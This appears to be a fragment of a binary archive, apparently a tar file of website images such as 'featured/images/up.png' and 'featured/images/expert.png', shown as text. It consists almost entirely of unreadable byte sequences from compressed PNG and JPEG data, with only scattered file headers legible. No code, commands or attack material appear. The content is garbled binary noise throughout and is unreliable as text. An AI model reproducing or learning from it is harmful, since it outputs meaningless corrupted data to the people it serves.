U�"~5|Z���~�m��P�V��?�'��]Z�σ��Bi-�Fa	7Ww��G�F��qprk]�Dk)V���n�C�Ok�,�$�~���	�6�¶	q�w���k�ǎ?23$3^('ڢ�T�Ě}ó,sÆ�����ޱ�i��o�	u[��}b-2��[�o�����_��iiU��,g�����	�v�> ^���c¿��ϋ�-��%��5�Ѷh�I�MOf�(b#d�W$��y�s�1�>2�:��ό|Y�����ǩh��#���X�4].��H�QE�܎/��m��UE^�j�7�Hu�����=�_����M[�����4ϊ�E���:��?x�A�?mԤK�X&��Γ����q���ޣ����ފ�io���Ҽ]�ۛU����|��ht�&�Wʖ�H����kK�d��0��.��\�♿mme|9m�i~���2ks�fkU[{bڌI��\����2ȖҖi�ܑyaO��u-GG�[�'V�/f�um/�Z�ƙ��2[�Ei#G"nw+*��FG ԧ���ڇ�S���>��_�_�G�t�L�u��X4�V-ĺ�+cy$�6�`�b[�Fk���.@AX�	'��K�NO�������Xo۬qE}k"���wb��ІpĔg�8��!��ߎ|%o�T_���A/�m�;��x�f{��l<9{ok8��V�I�ݣ2��H�H��9>�ğ�R>���S���M��[uox���#K�
��܁dY"i$��',���.6����y��ն�i�R����{׉<G�w��\�w�w��Y�5	�,��x��]N_)�S�FE���K-z?�<A�V��s��մ[=2�T����?�^>�q�[���VX�Q���	���8i��f�Sׯ<3��s��;?
�Qk����o{y����s$3����h�GU_%��6X��γ�P��|M�Y���7Y�+�I�Gey�A�Ri2�yv�cIV�u��1'�@���3�<W��o�#.z���Oi�u��^�–,��e���Abu;?�n�l�f�JE�mPG k����j0#��­���n�^�eO�G�~%��#L�������|�Ԓ�c�T�|��B���L��<M/�?��,�->�o^���_�^@������]�E�7O?O�d.�$a6#�Œ�x���|O��/�>7�[�?g�K\���cx��|�,�����[�cu+��1-Y�I�����«�SI����η�Lj�����7k៊�F�pEe%�Ք��;w��}�9��GVv(���["�[꿶��];Q����4��
�i[�Q֣�u��k%��Ėj�U�(v_�/�xƿ>�����)�x��w��)�"�Jݭ�m;�3Y?��ޓjw��y����S�}���д�\������^-��j�Y!��d��#,C�T�D�s�0�J��AO�zz_���ͿE�~'ډ�~�z]���Yxs�ƽ�܍b]O�Z�,W�{���6��혮[{�(l����xgV��[�:��o|+�¸�o[^�=�o[ݝ66��l�RT_4��wF�p�+7��+�M�_��!�<��?\����Y��R��H��WgH���k�����2q�ٍ?�n5_5������ğ����5��Cw
�� �����EE��1H����{�N����Oٴ���lT��tv>�ӼY�l�����?��
�ɾh,��
�v�%�Mj�.��|3I�yj�4�N�D���-[�����&��?xV��C�
�]u�`��bW�Ai��)"��ш��Ay9��[�=x��~+��]7�iLo�m�=C�zw�g�H���I��[k��-�5��Fs.�s*���t�|O�<*f�-<S
�߆�6S�!�Д���d\�Ls��$�<�ΤcG�v_���N�}�;�k{�r�o���E���A�%���B.�e���s���܊�|�=�:��=�YO��^�u}�=�\I��5Z�@t+
��r[�F�1(w(�xc^,$�V�����ď�Z�Ծͨ�:֭�)��.%���HdIg�򌊖ڥ���H��+�TK_:|�7��Y�:�����:���L�;�����T��&F��m�$h�^ZFi�B���5�J^�s]��W>���?l�N��i��-���Ŷ���/�[yaX�n��|����t�ˮ�/�2�^��럵v���[E�W�|C
����W�&�kP��$s��n�x�41��d&pd���$�� �'�,��i��=��~*�k=�~%��6����Cba�
��oq y���_:^x��G�-�C�|P��gi�
��:v��������#�
*����y�Fq&S�QHʟٻ�_����}�ݹo�����v�z΅{w���nm+Z��M�k;�	&a�|�����Gܳ��5�v���X�mi?�jK����,��Ě��,tE��z$���Ԥ{���*
;y`1�rI�n��>$h�.��x�ƖrŤ����J��Ԧh����&��&TS��H�f��F2��]槭x�Q�������ޛ�|7���鉨x����/�:��+����`�f�6$wQ����������Sw���T�T��ۋPH��1����t����*�]��ND�o�����cf�����]�ƇG�Ƴ���7�+��Z,~
𮗨ZA�ɬ<���}�K�#�#"D�J!���׋>/|D���[��S�����k��J+�g'���eYI%��a�w�ך�˂!o�Q*�I�/#`uf<��kJ��6�7��ҕ_j��[�O�>@�R��ou���xs�~�w�;�P��}��MMuU�X˩�ңih�ݤ�bļ��+hǕ�o���featured/images/up.png000060400000000507152434416630010750 0ustar00�PNG


IHDR
���tEXtSoftwareAdobe ImageReadyq�e<�IDATxڬ�=
1�g��b�l����B���F��-=��v�B�#(X�f3N���?���?/����ڂ��`]Y��}t�`��2�W	�F0��i�_E�rA���#A	��
B\ڂ&d7�n=h�Dv��V��m�jb�mc���&��L���ğ�`�EB������2`:��ۚ==�j$�!���,��ϡ�	��C%�{��
�2�!�s���U;�v���f���{snIEND�B`�featured/images/expert.png000060400000066614152434416630011646 0ustar00���JFIF��C

		


	��C





















��
="��	
��f
"!12B#AQRb�3CTaqr���	$4S���������DWcs������%5Udtu���FVe�������EG����J!1AQ"aq�2���c�����#BCRbd�������Sr5D������?�ѣ^M4�C{ j\��+��H��8�"�	o(K,	��Hu�[~\�o
i���v\Ɏ�䅐4��|^e�)�X���c~����Df�}���A�X� PYq�’Hz����u�.�� p����L�>T���o��M�pq�{�G.���t���H�v�I"�'^�Ď�xf@���k��������t\y�t5L^Irr�G�����F�w8��*�P�a�$��
S���P���L�1��~:@Y*�5>T��)묉I�ȸH<��+`v�.$�1dw�p�vPu�[-�೵ئ��s�7�:�RܑԹ�h���#�ŕ��
���:a��b����v[}
q=�G��ѬsQ�L�������v�$�ى7"-���t{�g�<���nv
�J��FR��$��=��#�
e�Y������R�	3-��5�A�d{�g�G�*ҶD�(K(Tw�kб�U�{�kб�T%e�I(T{�kб�U�=�5�X�*�D�+}o1�B�����c^�����+j2�V�סc��d{�kб�u�%e�+}_1�B���Q�1�B��֨��!����,�{[�kг�u�U�h�Jη�סg��:�c^����e^�+:�c^����ky�z~��^�+��c~����u<ֽ?GYʽm�X��Z�,�k���X�:ڱDJƧ�סc�Uw�kб�U��b���/5�B��T}����ā
�����FN<{�c�N�	��e��[vӿƛeSQo�A�qy��vi����0�^0�����&#w|*�uB�-}V5ܜ��뱂B���<KZH�����F����Ό�������oU��4�̊�> C@�"�>�b�-��$+�C
�*���	���
����ۈM�nE}�u��N(��ѻ�\V|N
��4�3PT���S�K'B�Ѧ�gج��m�-&� ��V6{0�2t`>��|�[lxɱ�̈́ԷU�z��t���T�M�\�m�˘C.��.Tf��o2�����	T��>q�.⧛M*s����ֲD��H�D�f>y�{HP~���Za��4F����������
�(�t%�5��
����9^�J���`
�ј�mk�Cjk�F�VR�"��Y��е��H����|�+4�A�A�h@�>ʶ��P��8X��'��[/��3�u�d����d+q[m�6Sҫ��1#�3��qHJ���C⇗�e���-�Y���i5q��OpL�h#��Wx]�.���`��
��$�)/	� ��?�$�(+7���g�q_�S�
Vy�F�ƀ�s�B�ۊڀ��J�&n �\b0�Nl�0�_����Y^Ŗ�~kc��Q�;�{��a�oR�����0Mn�fZ$F��z��r5��U�quV��o��@vj��"�V@�86s8�q)���YaC9-����]j����Jq@��J��6B��W�������y�%��hf0QBB���]e�Kp�R��`���a�u�u�27�@�msy<V�ԩ��eg�u3Պt��LTs\Ze�c) ���鹍�3��Ht1��{ j8“�b�&�yN�*(��"��#�.	vF�b2ۀ.����t��!�o��@#;��lP�H��;}[JޯV�`8��a��m�l�ɥ1%�8X�d>�k�e}z˧����E@=35D�����p�I���vSl���#eZE\�#y.��Em��l�A��/D�a��q��=VUHQ�#���Z+�'g��Љ��X�8|T�"*;2P8�+-�[X6���SUB�.��!�p����K�›d��ي7�yY�Y���^�	�X`�6YW�D�eM�A��� Q�k��7%�Y2q�@���f!�$"$�����Hp��U^�����!��8��"���OU�S��I3�4H�2/�BH�1%]�`�n��?d+�#��U�"����PES�3�>�@�t�k�<�F�BK<U�&O&��*P�]a��Νŝj��Ŀ�_:�V)���A���s!ꪑ-�y7uku�>/�/�F�
��gR�W�����f� 4��q;���j�)#i��|g?E�D��U��c��+j�����b7'xڽP�,�+%�ua���]�N\��@W#N���[X\S��0�l�nqdDj$q����[��j5��5�8lk�SCx���I����j�	v��Y���̥�[�USK��u���/����tJ��V}/�[��i���D�#�ㄤl#�eN���{�i�թ`H�4�jB2𛍼:���<k�ץP�*�eQ���G�]{�"�3M�a�<�R~W����X��қMW���|n;�m�oX���9Ή�*䃨��][D~MN��U���bg�W�V�f��T�Ml���q��d]��gX�l���t$�񭒚k�"�H��E�Mvx2�+��ks�DN�
U9�i:F��hhD'Z%0��`��e����U �p�/x�"���IQU�$��H�=_6�cH,:��#r	9	T��u�slˆT�]��]+:���H0F����$�O`/ę�E�� "b�"{9�6�w-֜�&�4��MZp�D�j\c�FKD���#�d�����j�����`�>$ۉ���|�v��W#��eF6���w9���k�t6�\�kr������׺P����^x%q�q�4��C�>e�wC��2�ť�ݧ'[��؋�B�Q1�u�q�Q�ϜLT"��/�4$�i�l�ox�ZBS5m3<�G���@�Թ�2	nP�@'�I�	;� �n\��2�P�m�w����JW_6�Z��
fhЅºfM���5��F9/'Q�VUP�ۮ�X^-K���*�Ҫ�.H�]�]n͵�8�*
���䨄`��њ]����I�=�7ϔ��m�������m���Զ�b�4}��n�
� *4x�k}�ϥ�y������m��+�i�|%�i��V�ux�TJ˨B��y�5R�Q�%˛�	ڟv���HQ�Me9$��x�\��o	5�
:��
��i��@�I�̓�`�V�m!,���DhuU�!%Kz�
P���G��
8�����m�1/(�����让KR��`�[l1l�����:2�:	R��eЊ��!{���t�u^u�lM�AŴ+��n��H|���*�/?)hI	r�He<��-:�JmD�;�nD�:�z��J�F��J���t�i��ş��֑pv�K��$�S41�E�{4BD�^��[C����=l�����D!"*V���`|�~���ǭq����h�$"J֗�k����X��>[�|~m��ZI�t�k�9�-P�qQ70|#<�̕u��Ļ,ڳQ�rô�UDqw@s[�y��zrDi)���*x�d��r��[tVm��O�͢�.
�ٗ{>%l���<\Us1!P��r#�O��~�K�?kα��~4�uи,$4@fh����7x䵸H=�[�a�I�ѹ�EU71�Y*"gr���\F$��6��l�:�� ]jf#�=Z�^�J�= �ɄK�?j����
����.�Ґ�v�7�QV��Z�c�\���;i/��ǀ�����r*��\�
�����0$n������u.�	+>��kł�O_�5��z�L�5�ַ�>Ջ�S�{���|̨�
�,fM�h$�����p6���m�g	���ң����AT�o��h�p����}��R+����Yr��fҡ�+�%��a��E)���}R�%�R,��i�йB	��`|��B�6$�[�&w�U$&'��,"B"��d�<CDI���^��tѐq�i�H
8�Q�"��
�>��
s���%PPA7H�An�F���T���-�)
���T��[|8x0�Q�D�Ս��\�tX���U�uUIސ�
�8���}��h�)*���C{��[wdFƚ!����]F��ȑ���"�ͬȕ��hx����c�Ć"��=)U�T:�f��+�g�
<�s���Gu��@tPTHQ��0w��l�/3�+8~�#�M$�&KQ���ۅI�I�H������3��o��0���ƌ��9�����-	�h�䈦Gm�KZ��2�M�qC;�AlU�b:���&Ξ����H�c�~���e"�*�����(�u�)��t	�uр4ђ���%U���\�)ּ�ϷW��|dF�uE���[�q"Eo�R���vt�F���%u�C��m�Y]�
Ty���$BBuE{Hª'��P���h.����$�B�J����:�]7R<͑SUW�
ᐢ���MtEm{�`��S�v�d"�*���j���?GZ�����]T~Ft�K�QmX�3�m��(㒀<ڥ�n*j)��wt.��c�Bȼ�ѣ�*w��D
��wgiS�Ӥ���<1䜕y��-�b!��2+a�j8=���ʎ���yӔ��:�O��:�s	����*z�_��i��~�Tc��^Ꮆ����ʀધ��IX�w�q��Z��ن�k�yt!S�"`<y��epcMѼ���Lzk�_�U�5�/�*�v��đ�E&[�ڥ����}�R��Ӄ��R�݃�?%!�"JIUT��<�"�9"��	Z�Zs�)4�\$p����xk	@`�>JM&�%�_�*u�g�p��/���&�i�ioDQ,�z8km:2�K�(�Q9�x��kLd>E.7�DBRB,�2N�����>m�����
�]�|�K�p��͑�H-��8Bdm�p��*6��o�Z�;r/
���J~p���i}"��4�kXn��T�덯/�ͯz�k�G�j8��`=bT�L��v�y��o�R��<ӽ�'�w���둯/�O�׽r��I�ڄ�ǺS���#ӥ�_�B�.��Me�\GY��:˙d�+�k�g�Oezo0��QԷ�L����3^_�ͤ�wCdŇŧ�I�l�F�{vp�mD{�߼|O�ʹ#nO;!���~�o���,�]�]�kpT(_T�g�V#��;�4� �Y�`p�8�7���o���v��{
<��q�%"�k�+�KϪf<�*4�n[�+�)�Ÿ���㬗�e�pUC#%"�t8|57m�4e<�Qz�F��c�aA�o��p٪�7���7�]n��%s�� � ?�!2d��(e�EI�71J��:�[:"����\�ʌ�%b�d����Ѹ�ĔW�o������d�]���oʰ�i|�4GU笛<ŗ?1~�H��G�R#��O�`U�^���NJ��J�ι5�FE��L���U���&����nm��I:[�=�X��9w�Tt���)*z�<���l�[��ѯE�(�~I�mKN��BTa��!=X�]D�u�CT濃��*��J��IR�J�5t�K��>z�T�׭�"V-ET�ߺGg9N5���:�,�&���O��v!�re�b,v��~C��@�q�H#T�{Uc`�Ĭq�WA��';��"+�m��=�c�`A�R�~��Ƅ�a�I��	C4��&��˳�	T��x�:��j�Q�?���c;ͷ6�E\�Y'�i	}��t��}��I����Bت�e�]�f����j���=��f�Q���p���z��|A��sϛ/�Q���P[ER�<�H��K,MXi��m�':�i��$�g}�}Ȧ8z)�,�Е��!��3�����g�uF�Ҵm'�w�
WݶiZ���%�Q]l��W�!FԽ��ˈ.�:����/{r$��2� �LA�q�\�Ei
'�7a����%=SjK1g�
İqq�w���-!��g���x'�C
`���	���H@z��i���D�j锅J.�h�z�uG[݇Ul0�H�c��S��<�b�
d��ђtS{�T��sD��%�[3�&�J�shd�
L�f�,�婌vQ�Q��TG�o���1.�g�b�@��Cx���IPdw�-F\��v�C!�:�)���lA]v,w�6�
�hu�;D��V�/	-��^�*!yv�O��&�M�wC3��\:p��*됞i�}AJ��q�!�l���z���C�U

���s�q��N���V�dSQS�S>|Ӈ�)ىJ�%�u��؈k>D�(�r�6�P�z@�֛l�߹��3�jp�qy�
��1CV��'Z���NYi�*9���%z
s�u"z���"䴛?j�UR��ߠc�JY*���d�������8S�0�:A��`�yl��x����]��|w��hR}g@ӿ����Jٹ��w2��߰ꐫ���"�/?='�ŐK�9���T׸�a��4U�Z�s틢d�Z���`dY�۶��)ܑ-�S���J���%�y�[{
��7v.�����{�QR�h��'�雼���(�檟
SӸ�k�I�-��iN\DR�h�)�k;_�nUh��G�b��ؼQfH����w�}��c�i��_l��|h�<��k��掴I�P�|W���Q���x��Vuh���c���<
�[J��.����F���RZtl6��q������ܞ��b
�f0i�+�7�3��'�>+��ɫ��8y�ֻE�P��e��-��CP��[�&o7w�hr0���%
���$�	�v\l��/.�-�W�f��b�Q�%���/�L���k������3uB{���el�����R�
Fe�ϳ!}��t��71���}������|�������(_�WJ|��>nzL�>ƒ��t�	\�R4�^�%��tk��봞�yԣU���M�����@��FY{�D$�(� >��ۥ�䔛(�}s���R�̨�*�ۮ���8l��@�9"��h��㬔��~�S$(�w"���ዣL�긚�1��M�k�z#b��S#$��L�����ڤ��1��c�X&&��G�j���
W�
um��Ix+��n\��
�Cm�K
�uY�W�u��<����]M$���v�뎙��c�)�����bX�"*A�"@����J�(�N�Uzj��P�Q6/TT�
���J`i�O�qx���1g�N|���f�!�q�ȗ5ZR�d|�hr
c����������Ҋ��J.9ҟ��D�j�!N�����ĽV�ڎI6��M 6N2|m�m;V���_IO,/���	P���T\�<�N/�U+Ĝa�y�
�[[���D�|�J�7��_�&�vK�ۓ�^���C�`	���>'+=qbZ�
@�x����B�Ր��C�=�
�۸܋X�� �	�b�\��$6���3%���w�*���i����j�Qu�o!x��p���/tZI`�mT/'3L�
�I�Z�Nٓȃ��*�,�a�ro2�w�H��p��e�e:A�)��瞦gڌm��ñvQ���-AQ������oux��ڮsmt�Ir��-IR��{ĵx6�>��J ��]PQ]DG�Ǟ�jk�e��:�T.C�*��J_�Y�����������?�}�bG%����-�PN!�����=���U��M>�����\�5��w�vxۛ @��pM
��LK�͂]a�u��N�� T`�:����I��gq��d"xF�xG�-����p�*d��̝��lv��������h�ﶤfL��b5��N��ux���//���]��Y6T����ל�r6u�Zw��͹�|�f�(Wh�\E	Q8�y�ziv�ɑZ��ދ�8)�ۜ��\$>Pԝ�XN�&d����>\�ؽ�92Xa��0��N���o��EtRnf�B答<F۞Q��
��QI�c?�@�x�����vA���~ڣ���z�U)�˙$�R�հ!&X6W6�������Bq�B��>t�k_N�i��\�uW�8�Q*�}M�D�cH�D���EL�	$4��5�r>�2�B�м"Y�:�oԘ��'h�Q����,������c�6��u�<L\�O8�	�L9O�.b����L��*Q��W>�3���Ѧ��-\XY�3�L԰�j(�p�}i#Mϊ��
��R[�sD�Qzk��E����͋�<ӭ:m:Ӄc��Y��*��X���E�
���-�U>�~G�}�!��ya�~�TX��X:�n8w-^
��G�~�ew7I�[�lP�*;�Zk4e�L5�+����<]^��-�36;r#:/2���O4��H{��h�K>uJ�;�w�d��'�Np|L�$rC�Ⱨ<��.�l10�U5nØ仱\!���4v�#���#�Ez6���S����}��?����Us!U���Л�����0V���
���2qE��}���g�4�)'���S/��\����-�O
�Wv�z3�d�_L�jɶb$��\��luy������6i�GRR�]j8'6�	�̤7US�
����i�?�3�^�=�ɧ��~'��MA![S3L��Ъ�NTEݡ,�ϧ���<��@,��:zF����5�F��؅|�1K�>5��L}O�ɸR�ΌБdN��w�z��t>�&l��m/?�`Tߝ �p�S�!/�䗓Y����i�Zz4:����l�R��^R�$y�X?c%෯R.阥�n�(����yֹ��.N�k���'2'��Nu(�)��$QEW
�Kx<ѷ��*��-v\K@�Q�*�jD8�=�����<�rf"����Z�O�N�]gc�}Y`���@�WU<��i�����7X<�_d�n�p�4s�˪^uW^뭺�٬S���#Ʌ-�."k;�W\��d�������k����6	��=��+�
�Xj�v`7@�޹��Ξ�7�P�D�q2U��D�ѐ>���z�T(;*n�=��|`d�V�A�dus�NVz�a	�V�2�d���է��ۯk���%�x0֟��u�q�������S͢s@�S�|��p'���Do�
�%e�A�l}�e�PW]w\齰��\jn�B�\lm��L��.��Y�ꃱ��+�!@��@2�F;��[W5�
��z���@n�DV�i�0ܐHqO���|�}~1<���M`
����2��]�`��r����]�؝kz���Gxח֨��{����@��%�l��j_iZm���P��㐮)8K�8J⯾�^����5
*,�2�(�.j\�=S'��DǦ�-��E���a�x�~
�)�u[��&�����Rj(��]� |��6Nuk�;5��N��!�;�ļ�N���w9���x�LR�p�W�E�\��*���L�塳�_E�*Æ��oo(WW�ӺM�U`���EMg�M�蝏$�s�=�J���X�^�3!�(�Źhs7]d�[m9%�i���}�&4���T�2NdJ[�7ѐ�h8�d�=��'��ZV���c���櫈լ�I ����`��H������S�%%_ƴ� n��W$�s�G��76kI&�"���]�T����-;e�ćn/*�F;e2Cj������
ZDn]s��R����ߛ!�R�rL����Ħ㦾%��O�%�'	�>�Tl����
�\�	
@��h7#�E.��A�!o��ŇW[�3[������S�bL�+f6�뇙�d�iG%�F�G���6?�>�٬T�q�pِ�^����N'hCB�R�%��bwk�^$©�*����.
�ZH�k��C�!*y�q���%N���Uf�}���P�iN����\D�23��{��,e�|^`���'84�=�����`��̒n9��M:n������Y���h$i��x~#F�2�D�:��G*�ny���Ѥ܋!��&�]�J�"*Kwۛ�t��wx~���n��s�s���#�r^��O���Fɫ��;e�	�E��w���Z�Vx~���n����x�.�1Y�Q�ɏ�Ca܋m'�~#_����ƫR�?�/������"�Z���@#{�u���4/7=������N��֩�iu�k�D.�*���-���"����i�B����T��`(9��4�L�x�'�%�h�{!����D��5]��ͫ���r��Z|4u���p�ڃ�A�>�6�-���]v�K��~�g웹���ۧ��~�"H�-��%��
�|���
{�U5���JB`����W����s�r�Q3K:<6�y���*��Q��1m6�D��L�(
�8:����/�?ަ����!�xsT�״?�F���.K����cn]��{=�_j�n��ͅ���{����h�+H�qD�+�2�|.j��ҤwP�EW�&�U����tw6A���6��M��-��8h�kJ⪕�-�bXG�Hz`K��iwɒ&	��ާxd��۔����~L�-C��bu�b4�J�
:B�Rd�ۺ.�I�/hܿ�֧�7�g�R�2C���O֒�����l�q��-r3��)����\6�s>=�@ג�KCZw��@�a��	ӹr�|[
�$^1�<i7�/G�:��!�Ek���}G�^��~j�}޻�x\G��Ad�����r
\	&}$�w��:�T;�w>��=�a7�i1�\o#q��mǞps��m�gZ�Z��0J�^Sj�YB������SkF.մ٭�6���
h%��&j�oKv�0lFf4,�
�h�������/�B�~c�
W��>9�?��3㢯FH���+����;�٤�#��%�LCM�%��$�6�u|�zcAb�2E�ޣ�g�A��ax��C�I�b���#�A�5��D�c�>]��ӷd��ȑ����;"n-g0���	���շ��N.�v�;�n�wmIg���yv*���q����,�.L��M���?i���?�wF�n滈>p@��3�
FP�?7�Nmˣ��(�>�΁x:�Tk��3Z'Ӛ���3\�TJ�l�"ssЕq����Q�\����g�|k�_y��9��M)�#~9���}�t��z%�E�:�JR���%&lH�d�	�
��|���pN��)�ˡy���$DN���~:��-�8"I�� �C�I���iB
)��F���ƞ��i�\˚.h����E�J7Δ����h��{گ�|��O�5�T�:&l乥C�U<K�^Μ���{�{�q�sNPWȂn4� q���v��}]��R�2B�2!Ɇdm6��.s�&�[���r�$�
���~4�	�n^-jH�qPY)���ʁ:�NP<C��p�Bt�˷�)�Hx��� ���H㎺ޛH�V�I�]�Rf��?��s��vwA��"\t�6�#b�
d�l��w�'L�렻����3t�7gd?�/���J<$%�١	Zm����`’v�E�|s�=6��S������j��w��UQ�$�Ԝ��!Z�;#Y x�\��>[�3$>N���!(8�!$��a��>_R�mZ���u��	�>�Eבl�1��%ae�ۯmwvL�d�@����e���g���|ʒX7{|�9_�]��i��ڪ[�ָ�(j�ä
���n:����E�_���T�V9�K�DV�d��.�X�##������>
7���R�*}�����=���H�1_�
�Y�I�)L�;�sQETͿ��9�2�T���ZJI�t�w5���'>W��ؘl�?*p�-]H��f��=sl�N���9�x�#��9E��DɆNC��^�:@�V��Ѫ5��i��}%��x&���;$aꋖz˟�]Ji��Ĩ�y3v_�]��=���䈄���(����H��j.�~4/�����
��"��םb.=y�}K�p����9�Gۤr4'��F�Km�|�(�S�b��ۨ�ʜ�5���j��[Z��6�D%h��D|��'���Kw{TBTQ&�X!^�F̐ꚭ��B�P�eYi�o�`Q_u%<o�-MV��&^N�[��]�����i'\�X�13��']5T�ȹ\e��K߼�nl\�U[�$���>�ʥ��8ӎ,�Jǭ��*w8
����eON�V8k�-~e��6[�I1t�C]���W���p��W�n0�X�gZe�uQ'@�Pz�g���~������'��fX~-��v{�)��
:�T����?X�?���a�H�cŊR����^�"����s�Ͻ%�.���Qg.��|�I�zA,a=0F�F�W������o���-'����#�jd'�~�h���AM�����x�ڨ '�Cq�m�'��v7�s�w�4E���+�'*s**s��}���'Z�'\K�U0˭���d5ɿ�1��#b�bxVm����$D� �4b.��t��]�u;.7VOlj���ϒ�;��2IrS�+-���F%+t
ؘ>M����}]g�'t��r�U�۪���Ix���fzM>�1	��!��{�A����{��1�b�s��t`b0���m̘��#�<�����u\ -kI�>P��;f���m	h�k>(2�"
4�|-�p����L�:�9��T�]�Iϖ*Y'��}5�q
'?�ş�}5Zs*D��"����yD��m���9i��Ể���(aB�~�|��Ʀ�"\�CPž���(����o3�F�����J��։��|�?|rp�8�I�l�K
��0<�/a�K��j\�?`�-w�}�P�ĥr(�
ƚ8�d�̔ޣM�C��l�_wDד�����7U��4�T���
w�O���>��o_�%��#EVԑ�̙�O�e�_cxMY���5syo��TL�8�J�+v�rJ3Q��Y�E����+�D}�)��\ק�4�jun��>�5�^�G���y�nH
P��alʤ����#�m�����[�Ք����.�6����T����T�t�$�
�Nߨ�l��aG���bwA��vOf�(Wm���4�lqe[A��������%�����$�J�D�j��S�X|IN�u����mT��y�1��r+��mK�.{�Z�%�1�s�*8�3��"ETmb����ꂖ�
�
 %�}{�G?��>��>��J/�O�uM�߸֒#(�
�[!�O����9�zqńu�.��m{�;㍍�J^$wN����#�h�c��}�t��
7��o2⊮'O։Ɖ��Z�g��5ALMQUrEX��k�ϿT��p�%g@�Am�sT�V���/��:7�%O-��g$�c��
b�ƺ�x|�*|�.y��QZSq&�EUp��o�<�Jp�<l�
���k�
�)�����ٺ���/����Q]y#��K�:hi�yC�T�+a"�6]�^��a�+x�(V���*!"晬���nyWT7���f��R�e��(��:._�c�Tw���f�*3�+�m熰�Ь�/ʊcT����!ȁ�E�T����u��m8g��D�V�DϫqF>�W,?d��

���\A-!�E�+��Zd��|Ҹn��cM��v"Ȼ	L�B�CN�Ỉ釳��RpqH�$J��M�y�/�������#AR�G�C>�z�q���L6�kh3�ь)�6Ց�^;��]A�4ty^
1p�m��{?IW��9�a�}Ԍ<�9����p���cRV�6�V�C�ꆂ9%9���Z�B־8T��ξ`eꔰF�K�*Wv[�:D�j��76R2k�^�֚
�h���ׂ�M��#A�Xך�weƣ����#���	��)U�f�!�5��4�����ՅGmE%TA%%R�DDz�EQvð�o�;)e*�**�2Ղ.u{���g��m6����M�=DS(�Q[N���
A�S*������i���ué�I�<��'~
��6IN9���V�JJDBЕ�ߡU�x{�)HK��jbL���eڵ�mK�m��Ɲ�v�K��Vc��5n+�4��ij4�ZJ9���&�h���q�ėX�"�vS�U����B���2
N���Y"ڝ�Un+����h��ĭݵ6Ҁu6
I���Q���<9�n/n;�������dc긮�2Dy!�S^��m��9�x�Qz@ׁ@�^�{�p���(��.G�U�
]�7�#uK�BD����S�v.��"��<��s��{�˪��v�p\��<	�Sv����2K�@�ǒ(�M9)2v�h:�m҆�<�*�掩��##`��yV�ՃlKo1����n�ڨ\74���I�<w}�h����9���~�׀E䍚�϶�Ú���gm�'E�����Wr����8V���$.Yq��~!$��y;������s+,�TH�G!�n^�Z^�Ŋ�����b��HQIrQA�_&���&�`�jH�B&CϦ<�C�$�Ƞ���(ЇD�{��o�Li��қ;#���Gh[��Dx���R����)���X��Wgq�EQ�6!�KM7�H�CH�
�'�pT�;���	f�ٶڢ��7iy�>��72>t�L\	c�@w<�T!i�d�>��V�V�{�A�g��
��2t^o��m�ރ��H�±7t� :��m�
`է� %��_�����v��<R�؏��
	*��ͷT��y�5칗
v�vS5Xͯ�#}9��J���0PM��
��0Q?Q5�|z���ߏ/%Bh>����UZ�;L��l[��?��=711O�ȗ2Y���T�mx<�ܡ�b�g�:??�M�tGą�T�{㭲�����?�V#tx�X.9���8��A�a�ck�-w���&�f"B��!�^cr]�|Ő��Z��A�t��SEed�ETUvKC�S�FV��&`��ծ:�>5ଭc^q�1�ڧ(Ɔ�5�
r)�E"�Dl܊Cj��^�]{��_��(2�J���8�l8َ�����
��Yy��U+k�8�<��j�z�����n�!7ޛ��n֞�8����x�Ue�|�g~CnK����C�ZoM����Q��.�5�F��#�?41�5Z'c �(:�HHH%���Wy]a�#�D��蚪*�+Ѐ�jJK�+o�@x�h��atx]At�����
�߳E'W��\w���x��$�#�,Rm`�UQ8�X`�w��W�Ԯ�JD��Tʢ���\b�Y����p%�Wvi�Ln �%��m�#�٩"��C��hݝ���D��GC%HF��")�)*+��i�\]:E�|Z|�YxK�M�Ȉ�h�f��ڐ��BB}K)�Ng�ׂ��W���y���F�!���b6��K���1�\��pD$�Yg��Yډo�c�N���MV��`� ��]5"D{�OPJ�uO��v�M���<Su勇�� l+EA��o?�s�v��t��j	�]�eP�Q��[�U-�gɭ\ڦQD�������s]��I8~ ��F�n��k������oWˤI��|М�C��@��\�ߨiu��`��J�Ԃ�6­��)"�e�:*u��V �
�q�TT�v�>mݺg ����SO]TD5T�SpM
�n����购�8�"`��|�<_*��*v��Q)�-���:�	f��ZKYx(��a=�A'?����.<@�%�tJ|�Bl��I��-���_��5u�x����n�9�&���b_�)s/2����=⯰|���0��E�
�E�_�L�M0�tBTM5�L��/�❛H�X�_2��j����f9h>��6ɋ.#����m!BTV��9n�&L�<Ol�^9�o�n�m�+q�eQ$��Iw��(�^�l���K�\���Z��DDL��.{�e^fJ'`K��)��<S27��>�ݷwײI���/뤙���\��y���+���"{Kt	9�ɴ�F�_��;\��e����8�8����湮N�	e�X7T7��|'�$.��֓e� �.+�6/��4�N���h������{X�����Ҕ=�ϡ���%���樜��;|�T��:���A�����u���B��W�����l><���+)֦ɹ�ո}�?��kk��	���LS�y��}�pz��`E/�n�X޼��F��'U��)��7)KM���<K�{&�h��%L�u�[~N�W
�M�%<��h𧜼N�'�IG��#-���*��}�M�a���K���:<��x0����놭�*�O����T�0����;�6����!���f����?Wɧ��鳒�����)���蔅V����"/�8�s�;�����5��������O�
����k\�I�go
<Q��gk�-�7�j��e������}�`�/z�rܝKɫxV�}���d�rcKa�e���nCj�[hĕ�[H[N����kdb"�H6;Ғ��‡�2����6��o�-7�㸖-���`�m�:Xl�k��pZ}sp�Ϟ�Z?��i�ώ��%0�X�8z��#Od���<�h����<��⣐�'	/SCT�P��"*�/��6�"x�ʍ�ʲ�R��+)�QP�߆���P7-��аJ�)ơNiy�m�H���m�Z&�|�Խ�����2�I�9�y����6F%_��.#���y���P\N����<8�,2���\�{Hp��&��E�Vʺs�M��4�M<�.@��e��g���V�y�R?�q�2���&j-�r�4M7H��e��4{t]Ύ�E� L��ʖ.ŀBM�fj"s���;���7?�d�#L���+��W�C_s-;�m��p���Ɯ�iW,��/�4��샭�"�"�+��ji�#֤y�y�W��}�-r���c�Ø+����(UQ�d�8��ʙ��ބFEVr�/��L����Y���+]���'�S>�7��E4zf�REȽ�:�v�9�$�h��'N��D������b�"n�l��d��/�zT�N��b@���m
S���f����:ss�U�ޯt�YP�
#��I
#^%[�!�UfvNy�/:'Mt�9�p�g�Ŋ*��d3ˉ@��������*g���V�r�!Nd�PGF5�#����W�{f�H;��Y��b4�I�ں�<F���ާ�+o[�L�a��9/h�w�H�
